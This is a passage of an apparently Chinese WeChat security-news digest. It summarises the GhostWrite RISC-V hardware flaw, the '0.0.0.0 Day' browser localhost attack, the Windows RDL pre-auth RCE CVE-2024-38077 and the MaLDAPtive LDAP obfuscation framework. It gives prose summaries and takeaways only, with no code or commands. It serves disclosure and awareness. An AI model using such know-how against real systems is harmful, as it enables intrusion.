	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">RISC-V 架构的开放性促进了生态系统的繁荣，但同时也可能带来了安全风险，如 GhostWrite 这样的硬件缺陷。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">GhostWrite 揭示了硬件级别的安全问题，这种缺陷无法通过软件更新来修复，强调了硬件安全性的重要性。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">差分 CPU 模糊测试是一种有效的方法来发现 CPU 实现中的差异和漏洞。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">对于云服务提供商和用户来说，了解自己的硬件基础设施是至关重要的，特别是在使用开放 ISA 如 RISC-V 时。</section></li></ul>
	<br/>
	<p>🏷️: GhostWrite, 漏洞利用, 内核修改, root权限</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x06
			 0.0.0.0 Day漏洞：浏览器中利用本地主机API</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">Oligo Security 研究团队披露了“0.0.0.0 Day”漏洞，这一漏洞允许恶意网站绕过浏览器安全机制，与本地网络上的服务交互，可能导致攻击者远程执行代码。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.3851851851851852" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=08072587&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZm3z7q1TPvLib48LK4zo4icTPia9CzW3gRibOfKoBvbhQBJsIr5s0A4aKPGG4icSzVnCaiaYlxWAqdKl0bQ%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.475" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=ddaa2e31&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZm3z7q1TPvLib48LK4zo4icTPzJbEkpWsaqGXPfcFia5PHfWGYbibdjEs4Ae5QiaxRa0gGcnKB6o0UTt3A%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.3065015479876161" data-w="969" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=f302975a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZm3z7q1TPvLib48LK4zo4icTPKHyHfBRwH8j8egdhdX7eTIVicNh4ZYHWUcX6PZL0aBDzkXUOrSfpgibA%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">关于 0.0.0.0 日</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">从浏览器利用本地主机 API</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZm3z7q1TPvLib48LK4zo4icTPLLAG0ricnDzRoNibjkC2vvoUGIEm4CHAynp0Da6YOQn3Fe2Mj8iaN1N5A/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZm3z7q1TPvLib48LK4zo4icTPLLAG0ricnDzRoNibjkC2vvoUGIEm4CHAynp0Da6YOQn3Fe2Mj8iaN1N5A/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=1522854225448222"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">浏览器的安全机制实现不一致和缺乏标准化是“0.0.0.0 Day”漏洞存在的根本原因。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">0.0.0.0 Day 漏洞的存在使得恶意网站能够攻击本地服务，包括开发环境、操作系统和内部网络。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">各主流浏览器正在努力缓解这一漏洞，但由于缺乏统一标准和复杂的补丁过程，漏洞目前仍然可以被利用。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">PNA（Private Network Access）是 Google 领导的一个重要努力，旨在改进和加强浏览器对私有网络访问的控制。</section></li></ul>
	<br/>
	<p>🏷️: 漏洞, 浏览器安全, 本地网络, 远程执行代码</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x07
			 统治所有漏洞：利用Windows预认证RCE漏洞</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">该网页揭示了 Windows 远程桌面服务中的一个严重漏洞，即 CVE-2024-38077，这是一个堆溢出漏洞，可以实现无需认证的远程代码执行（Preauth RCE），影响从 Windows Server 2000 到 2025 的所有版本。作者通过分析和漏洞利用的示例，展示了如何在 Windows Server 2025 上利用这一漏洞来实现 0-click RCE，并强调了这一漏洞的严重性和修复的紧迫性。</span>
		</p>
	</blockquote>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">MadLicense：利用0点击预授权RCE漏洞攻击Windows服务器</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">微软低估严重漏洞：Windows Server 0-Click RCE 漏洞需引起重视</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZm3z7q1TPvLib48LK4zo4icTPU251r3rc5DCt2kTuugJVDCRnWO2ezjYO5sicez8sAiaudVNLlVcjE15w/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZm3z7q1TPvLib48LK4zo4icTPU251r3rc5DCt2kTuugJVDCRnWO2ezjYO5sicez8sAiaudVNLlVcjE15w/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=8855182522448842"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">CVE-2024-38077 漏洞的严重性：作者认为该漏洞极其严重，因为它允许攻击者在不需要任何用户交互的情况下远程执行代码，这违反了 Microsoft 对该漏洞不易被利用的评估。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">漏洞的普遍影响：该漏洞影响了从 Windows Server 2000 到 2025 的所有版本，这意味着大量的服务器可能面临着被利用的风险。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">漏洞利用的可行性：作者通过提供的伪代码示例和利用成功率的数据，证明了该漏洞的利用是可行的，并且成功率非常高。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">安全措施的重要性：文章强调了实施安全措施的重要性，包括及时更新系统、使用最新的安全补丁以及监控可能的异常行为。</section></li></ul>
	<br/>
	<p>🏷️: Windows, 远程代码执行, 漏洞利用, 网络安全, 预认证</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x08
			 MaLDAPtive：LDAP搜索过滤器解析与混淆框架</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">MaLDAPtive 是一个专门用于 LDAP SearchFilter 解析、混淆、解混淆和检测的框架，它提供了一个定制的 C# LDAP 解析器和一个灵活的 PowerShell 封装，以支持最大程度的随机化和管道功能。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
